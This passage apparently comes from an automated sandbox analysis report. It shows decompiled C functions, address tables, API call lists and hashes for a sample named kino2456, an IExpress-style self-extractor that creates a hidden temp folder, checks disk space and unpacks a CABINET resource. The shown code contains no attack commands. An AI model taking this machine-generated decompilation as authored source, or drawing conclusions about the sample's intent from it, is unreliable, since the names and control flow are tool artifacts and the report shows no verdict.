								__eflags =  *0xfc9a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0xfc91e4;
									_t40 = GetTempPathA(0x104, 0xfc91e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00FC1781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00FC6952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E00FC597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00FC2630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E00FC658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0xfc91e4;
																					E00FC1781(0xfc91e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00FC5467(0xfc91e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00FC2630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E00FC597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00FC5467(0xfc91e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0xfc91e4;
											_t70 = E00FC2630(0, 0xfc91e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0xfc91e4;
												_t71 = E00FC5467(0xfc91e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E00FC597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0xfc8b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00FC5467(0xfc8b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E00FC44B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E00FC44B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0xfc9124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E00FC44B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0xfc9124 = E00FC6285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00FC6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x00fc55ab
0x00fc55b2
0x00fc55c9
0x00fc55d5
0x00fc55d9
0x00fc5600
0x00fc5605
0x00fc560a
0x00fc560c
0x00fc5638
0x00fc5641
0x00fc5643
0x00fc5645
0x00fc5645
0x00fc564c
0x00fc5652
0x00fc5657
0x00fc5659
0x00fc5696
0x00fc569c
0x00fc589f
0x00fc58a7
0x00fc58ac
0x00fc58b3
0x00fc58b5
0x00fc56a2
0x00fc56a2
0x00fc56a8
0x00000000
0x00fc56ae
0x00fc56ae
0x00fc56b9
0x00fc56bf
0x00fc56c1
0x00fc56f3
0x00fc56f3
0x00fc5705
0x00fc570a
0x00fc5711
0x00fc5717
0x00fc5724
0x00fc5726
0x00fc5729
0x00fc5730
0x00fc5737
0x00fc573d
0x00fc5740
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc572b
0x00fc572b
0x00fc572e
0x00fc5742
0x00fc5742
0x00fc5745
0x00fc576b
0x00fc576b
0x00000000
0x00fc5747
0x00fc5747
0x00fc574d
0x00fc574f
0x00fc5771
0x00fc5771
0x00fc5773
0x00000000
0x00fc5751
0x00fc5751
0x00fc5753
0x00000000
0x00fc5755
0x00fc575b
0x00fc5760
0x00fc5762
0x00000000
0x00fc5764
0x00fc5764
0x00fc5769
0x00fc577e
0x00fc577e
0x00fc5781
0x00fc5788
0x00fc578d
0x00fc578f
0x00fc57b2
0x00fc57b8
0x00fc57bd
0x00fc57bf
0x00fc57cd
0x00fc57cd
0x00fc57dd
0x00fc57e3
0x00fc57ef
0x00fc57f5
0x00fc57f8
0x00fc580a
0x00fc580a
0x00fc57fa
0x00fc5802
0x00fc5802
0x00fc580d
0x00fc580f
0x00fc5830
0x00fc5836
0x00fc583d
0x00fc584b
0x00fc5851
0x00fc5855
0x00fc585a
0x00fc585c
0x00000000
0x00fc585e
0x00fc585e
0x00000000
0x00fc585e
0x00fc5811
0x00fc5817
0x00fc5819
0x00fc581f
0x00000000
0x00fc581f
0x00fc5791
0x00fc5797
0x00fc579c
0x00fc579e
0x00000000
0x00fc57a0
0x00fc57a9
0x00fc57ae
0x00fc57b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00fc57b0
0x00fc579e
0x00000000
0x00000000
0x00000000
0x00fc5769
0x00fc5762
0x00fc5753
0x00fc574f
0x00000000
0x00000000
0x00000000
0x00fc572e
0x00000000
0x00fc5864
0x00fc5864
0x00fc5864
0x00fc5717
0x00000000
0x00fc56c3
0x00fc56c5
0x00fc56c9
0x00fc56ce
0x00fc56d0
0x00000000
0x00fc56d6
0x00fc56d6
0x00fc56d8
0x00fc56dd
0x00fc56df
0x00000000
0x00fc56e1
0x00fc56e2
0x00fc56e4
0x00fc56e6
0x00fc56eb
0x00fc56ed
0x00000000
0x00fc56f3
0x00fc56f3
0x00000000
0x00fc586c
0x00fc5878
0x00fc587e
0x00fc5882
0x00fc5883
0x00fc5889
0x00fc588e
0x00fc588e
0x00000000
0x00fc5896
0x00fc56ed
0x00fc56df
0x00fc56d0
0x00fc56c1
0x00fc56a8
0x00fc565b
0x00fc565b
0x00fc565d
0x00fc5669
0x00fc5669
0x00fc565f
0x00fc565f
0x00fc5665
0x00fc5667
0x00000000
0x00000000
0x00fc5667
0x00fc566c
0x00fc5673
0x00fc5678
0x00fc567a
0x00fc589b
0x00fc589b
0x00fc5680
0x00fc5685
0x00fc568c
0x00000000
0x00fc568c
0x00fc567a
0x00fc560e
0x00fc5613
0x00fc561a
0x00fc5620
0x00fc5626
0x00000000
0x00fc5626
0x00fc55db
0x00fc55e0
0x00fc55e7
0x00fc55f1
0x00fc55f6
0x00fc55f6
0x00fc55f6
0x00fc58b7
0x00fc58c7

APIs

Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46A0
Part of subcall function 00FC468F: SizeofResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46A9
Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46C3
Part of subcall function 00FC468F: LoadResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46CC
Part of subcall function 00FC468F: LockResource.KERNEL32(00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46D3
Part of subcall function 00FC468F: memcpy_s.MSVCRT ref: 00FC46E5
Part of subcall function 00FC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00FC55CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00FC5638
LocalFree.KERNEL32(00000000), ref: 00FC564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00FC5620

Part of subcall function 00FC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FC4518
Part of subcall function 00FC44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00FC4554

Part of subcall function 00FC6285: GetLastError.KERNEL32(00FC5BBC), ref: 00FC6285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00FC56B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00FC571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00FC5737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00FC57CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00FC57EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00FC5802

Part of subcall function 00FC2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00FC2654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00FC5830

Part of subcall function 00FC6517: FindResourceA.KERNEL32(00FC0000,000007D6,00000005), ref: 00FC652A
Part of subcall function 00FC6517: LoadResource.KERNEL32(00FC0000,00000000,?,?,00FC2EE8,00000000,00FC19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00FC6538
Part of subcall function 00FC6517: DialogBoxIndirectParamA.USER32(00FC0000,00000000,00000547,00FC19E0,00000000), ref: 00FC6557
Part of subcall function 00FC6517: FreeResource.KERNEL32(00000000,?,?,00FC2EE8,00000000,00FC19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00FC6560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00FC5878

Part of subcall function 00FC597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00FC59A8
Part of subcall function 00FC597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00FC59AF

Strings

msdownld.tmp, xrefs: 00FC57D3
A:\, xrefs: 00FC56F4
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00FC56AE, 00FC56B3, 00FC583D
RUNPROGRAM, xrefs: 00FC55BD, 00FC5600
<None>, xrefs: 00FC5632
Z, xrefs: 00FC570A

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-2610921595
Opcode ID: 766cf0dcb7169dac013a316b0a4ed07e19bef6a8382f3932f26244d5c83e47f3
Instruction ID: c50dc740ee542360fbdf1a05f05ac63c8a4b692126e61882112c81a7145764c3
Opcode Fuzzy Hash: 766cf0dcb7169dac013a316b0a4ed07e19bef6a8382f3932f26244d5c83e47f3
Instruction Fuzzy Hash: 4F811671E04A0F9ADB249B308F87FEA726D9F51B54F04006DF586D3191DE74ADC1BA11

Uniqueness

Uniqueness Score: -1.00%

Function 00FC597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00FC597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0xfc8004; // 0xd6d6fca6
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0xfc9124 = E00FC6285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E00FC44B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0xfc9a34 & 0x00000008;
							if(( *0xfc9a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0xfc9a38; // 0x0
								_t110 =  *((intOrPtr*)(0xfc89e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0xfc9124 = 0;
									_t66 = 1;
								} else {
									_t66 = E00FC268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0xfc9a38; // 0x0
							_t110 =  *((intOrPtr*)(0xfc89e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xfc89e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0xfc9a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E00FC44B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0xfc9124 = E00FC6285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E00FC44B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0xfc9124 = E00FC6285();
					_t66 = 0;
					L33:
					return E00FC6CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x00fc597d
0x00fc5988
0x00fc598f
0x00fc599a
0x00fc59a6
0x00fc59a8
0x00fc59af
0x00fc59b9
0x00fc59dd
0x00fc59e4
0x00fc59f1
0x00fc59fe
0x00fc5a0b
0x00fc5a13
0x00fc5a19
0x00fc5a1b
0x00fc5ba1
0x00fc5baf
0x00fc5bbd
0x00fc5bd8
0x00fc5bde
0x00fc5be3
0x00fc5bec
0x00fc5bf0
0x00fc5bfc
0x00fc5c02
0x00fc5c02
0x00fc5c02
0x00fc5c04
0x00fc5c04
0x00000000
0x00fc5c04
0x00fc5a27
0x00fc5a3a
0x00fc5a46
0x00fc5a48
0x00fc5a4a
0x00000000
0x00000000
0x00fc5a64
0x00fc5a6a
0x00fc5a6c
0x00fc5abc
0x00fc5ac2
0x00fc5ac9
0x00fc5aca
0x00fc5aca
0x00fc5acc
0x00fc5acc
0x00fc5acf
0x00fc5ad1
0x00000000
0x00000000
0x00fc5ad3
0x00fc5ad6
0x00fc5ad8
0x00000000
0x00000000
0x00fc5ada
0x00fc5adc
0x00fc5add
0x00fc5add
0x00fc5ae0
0x00000000
0x00000000
0x00000000
0x00fc5ae0
0x00fc5ae2
0x00fc5ae4
0x00fc5ae6
0x00fc5ae6
0x00fc5ae6
0x00fc5ae9
0x00fc5aeb
0x00fc5af0
0x00fc5af6
0x00fc5af8
0x00fc5af9
0x00fc5af9
0x00fc5afb
0x00000000
0x00000000
0x00fc5afd
0x00fc5aff
0x00fc5b00
0x00fc5b03
0x00000000
0x00000000
0x00000000
0x00fc5b03
0x00fc5b05
0x00fc5b08
0x00fc5b20
0x00fc5b27
0x00fc5b52
0x00fc5b52
0x00fc5b5b
0x00fc5b62
0x00fc5b6b
0x00fc5b6d
0x00fc5b76
0x00fc5b7d
0x00fc5b83
0x00fc5b7f
0x00fc5b7f
0x00fc5b7f
0x00fc5b6f
0x00fc5b72
0x00fc5b72
0x00fc5b85
0x00fc5b98
0x00fc5b9e
0x00fc5b87
0x00fc5b8f
0x00fc5b8f
0x00000000
0x00fc5b85
0x00fc5b29
0x00fc5b33
0x00000000
0x00000000
0x00fc5b35
0x00fc5b48
0x00fc5b4a
0x00000000
0x00fc5b4a
0x00fc5b0f
0x00fc5b16
0x00000000
0x00fc5b16
0x00fc5a7c
0x00fc5a8a
0x00fc5aa5
0x00fc5aab
0x00000000
0x00fc59bb
0x00fc59c0
0x00fc59c7
0x00fc59d1
0x00fc59d6
0x00fc5c05
0x00fc5c14
0x00fc5c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00FC59A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 00FC59AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00FC5A13
MulDiv.KERNEL32(?,?,00000400), ref: 00FC5A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00FC5A64
memset.MSVCRT ref: 00FC5A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00FC5A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00FC5AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00FC5BFC

Part of subcall function 00FC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FC4518
Part of subcall function 00FC44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00FC4554

Part of subcall function 00FC6285: GetLastError.KERNEL32(00FC5BBC), ref: 00FC6285

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: 006ce4915ecf8b6837a2ef9b5297d78ac2da4030df403344b5d824cdb67d8e2f
Instruction ID: 71efeb789d6d8e324538673fe831a14954b12c509f5f2c7ba34cb46f1f2ba164
Opcode Fuzzy Hash: 006ce4915ecf8b6837a2ef9b5297d78ac2da4030df403344b5d824cdb67d8e2f
Instruction Fuzzy Hash: 0271A3B190061DAFDB15DB60CE8BFFA77ACEB88754F1440ADF405D7140DA74AE85AB20

Uniqueness

Uniqueness Score: -1.00%

Function 00FC4FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00FC4FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0xfc9144 = E00FC468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0xfc9140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0xfc8584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0xfc8584, 0x841), 5); // executed
				}
				_t10 = E00FC4EFD(0, 0); // executed
				if(_t10 != 0) {
					__imp__#20(E00FC4CA0, E00FC4CC0, E00FC4980, E00FC4A50, E00FC4AD0, E00FC4B60, E00FC4BC0, 1, 0xfc9148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0xfc9148; // 0x0
						_t24 =  *0xfc8584; // 0x0
						E00FC44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0xfc1140, 0, E00FC4CD0, 0, 0xfc9140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0xfc8584; // 0x0
					E00FC44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0xfc9140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0xfc9140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0xfc91d8; // 0x0
						if(_t47 == 0) {
							E00FC44B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0xfc8a38 & 0x00000001) == 0 && ( *0xfc9a34 & 0x00000001) == 0) {
						SendMessageA( *0xfc8584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x00fc4fe0
0x00fc4fe6
0x00fc4ff9
0x00fc500d
0x00fc5013
0x00fc501a
0x00fc5163
0x00fc5163
0x00fc5020
0x00fc5027
0x00fc5037
0x00fc5051
0x00fc5051
0x00fc5057
0x00fc505e
0x00fc50a7
0x00fc50ad
0x00fc50b4
0x00fc50e8
0x00fc50e8
0x00fc50ee
0x00fc50ff
0x00fc5104
0x00fc5106
0x00000000
0x00fc5106
0x00fc50cd
0x00fc50d3
0x00fc50da
0x00000000
0x00000000
0x00fc50dd
0x00fc50e6
0x00000000
0x00000000
0x00000000
0x00fc5060
0x00fc5060
0x00fc5070
0x00fc5075
0x00fc5107
0x00fc5107
0x00fc510e
0x00fc5111
0x00fc5117
0x00fc5117
0x00fc511f
0x00fc5121
0x00fc5127
0x00fc5135
0x00fc5135
0x00fc5127
0x00fc5141
0x00fc5159
0x00fc5159
0x00000000
0x00fc515f

APIs

Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46A0
Part of subcall function 00FC468F: SizeofResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46A9
Part of subcall function 00FC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FC46C3
Part of subcall function 00FC468F: LoadResource.KERNEL32(00000000,00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46CC
Part of subcall function 00FC468F: LockResource.KERNEL32(00000000,?,00FC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46D3
Part of subcall function 00FC468F: memcpy_s.MSVCRT ref: 00FC46E5
Part of subcall function 00FC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FC46EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00FC4FFE
LoadResource.KERNEL32(00000000,00000000), ref: 00FC5006
LockResource.KERNEL32(00000000), ref: 00FC500D
GetDlgItem.USER32(00000000,00000842), ref: 00FC5030
ShowWindow.USER32(00000000), ref: 00FC5037
GetDlgItem.USER32(00000841,00000005), ref: 00FC504A
ShowWindow.USER32(00000000), ref: 00FC5051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00FC5111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00FC5159

Strings

*MEMCAB, xrefs: 00FC50C7
CABINET, xrefs: 00FC4FE6, 00FC4FF7

Memory Dump Source

Source File: 00000002.00000002.376994529.0000000000FC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000002.00000002.376989683.0000000000FC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377010747.0000000000FC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.377016593.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fc0000_kino2456.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: 2f7977fb4206d7644a8b7fe317d87c1e8d78436f2236fac8871d30fb3cd22e9b
Instruction ID: 8f6736b47fde300139ee4418abc486197dc068949f0beebbb4942837f4056747
Opcode Fuzzy Hash: 2f7977fb4206d7644a8b7fe317d87c1e8d78436f2236fac8871d30fb3cd22e9b
Instruction Fuzzy Hash: FC31A6B1A8061F6FD7105B61AF9FF67365CA744BA9F08001CB901931A1DAA9FC40B651

Uniqueness

Uniqueness Score: -1.00%

Function 00FC44B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00FC44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
